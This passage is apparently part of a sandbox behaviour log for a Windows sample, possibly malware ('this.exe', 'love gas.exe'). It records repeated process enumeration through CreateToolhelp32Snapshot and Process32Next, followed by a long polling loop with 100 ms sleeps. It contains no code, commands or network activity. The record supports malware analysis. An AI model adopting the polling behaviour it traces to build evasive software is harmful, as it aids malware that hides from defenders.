lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.472] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.474] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.476] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.479] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0254.481] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.483] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0254.485] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.488] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0254.492] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0254.496] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0254.498] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0254.500] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0254.502] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0254.505] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.507] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.509] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0254.511] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.513] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.514] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.517] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0254.520] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.522] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0254.524] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0254.595] Sleep (dwMilliseconds=0x64) [0254.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0254.720] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.812] Sleep (dwMilliseconds=0x64) [0254.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0254.932] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.075] Sleep (dwMilliseconds=0x64) [0255.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0255.330] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.451] Sleep (dwMilliseconds=0x64) [0255.557] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0255.573] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.665] Sleep (dwMilliseconds=0x64) [0255.768] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0255.784] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.967] Sleep (dwMilliseconds=0x64) [0256.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0256.083] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.188] Sleep (dwMilliseconds=0x64) [0256.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0256.312] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.393] Sleep (dwMilliseconds=0x64) [0256.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0256.514] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.604] Sleep (dwMilliseconds=0x64) [0256.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0256.721] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.812] Sleep (dwMilliseconds=0x64) [0256.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f7c [0256.933] Process32First (in: hSnapshot=0x1f7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.138] Sleep (dwMilliseconds=0x64) [0257.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f7c [0257.257] Process32First (in: hSnapshot=0x1f7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.353] Sleep (dwMilliseconds=0x64) [0257.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f7c [0257.468] Process32First (in: hSnapshot=0x1f7c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.536] Sleep (dwMilliseconds=0x64) [0257.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ed4 [0257.650] Process32First (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.724] Sleep (dwMilliseconds=0x64) [0257.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ed4 [0257.843] Process32First (in: hSnapshot=0x1ed4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.930] Sleep (dwMilliseconds=0x64) [0258.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0258.058] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.235] Sleep (dwMilliseconds=0x64) [0258.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0258.353] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.447] Sleep (dwMilliseconds=0x64) [0258.550] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0258.565] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.660] Sleep (dwMilliseconds=0x64) [0258.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0258.780] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.871] Sleep (dwMilliseconds=0x64) [0258.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0258.989] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.094] Sleep (dwMilliseconds=0x64) [0259.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0259.307] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.465] Sleep (dwMilliseconds=0x64) [0259.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0259.487] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.575] Sleep (dwMilliseconds=0x64) [0259.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0259.609] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.704] Sleep (dwMilliseconds=0x64) [0259.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0259.727] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.841] Sleep (dwMilliseconds=0x64) [0259.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0259.857] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.933] Sleep (dwMilliseconds=0x64) [0259.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0259.957] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.069] Sleep (dwMilliseconds=0x64) [0260.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.089] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.204] Sleep (dwMilliseconds=0x64) [0260.206] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.227] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.304] Sleep (dwMilliseconds=0x64) [0260.306] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.319] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.396] Sleep (dwMilliseconds=0x64) [0260.399] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.411] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.484] Sleep (dwMilliseconds=0x64) [0260.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.503] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.667] Sleep (dwMilliseconds=0x64) [0260.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.735] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.839] Sleep (dwMilliseconds=0x64) [0260.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.858] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.949] Sleep (dwMilliseconds=0x64) [0260.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0260.967] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.077] Sleep (dwMilliseconds=0x64) [0261.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0261.106] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.247] Sleep (dwMilliseconds=0x64) [0261.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0261.265] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.362] Sleep (dwMilliseconds=0x64) [0261.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0261.383] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.483] Sleep (dwMilliseconds=0x64) [0261.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0261.504] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.605] Sleep (dwMilliseconds=0x64) [0261.617] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0261.633] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.735] Sleep (dwMilliseconds=0x64) [0261.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0261.849] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.187] Sleep (dwMilliseconds=0x64) [0262.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.221] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.341] Sleep (dwMilliseconds=0x64) [0262.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.366] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.468] Sleep (dwMilliseconds=0x64) [0262.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.492] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.575] Sleep (dwMilliseconds=0x64) [0262.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.596] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.695] Sleep (dwMilliseconds=0x64) [0262.698] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.710] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 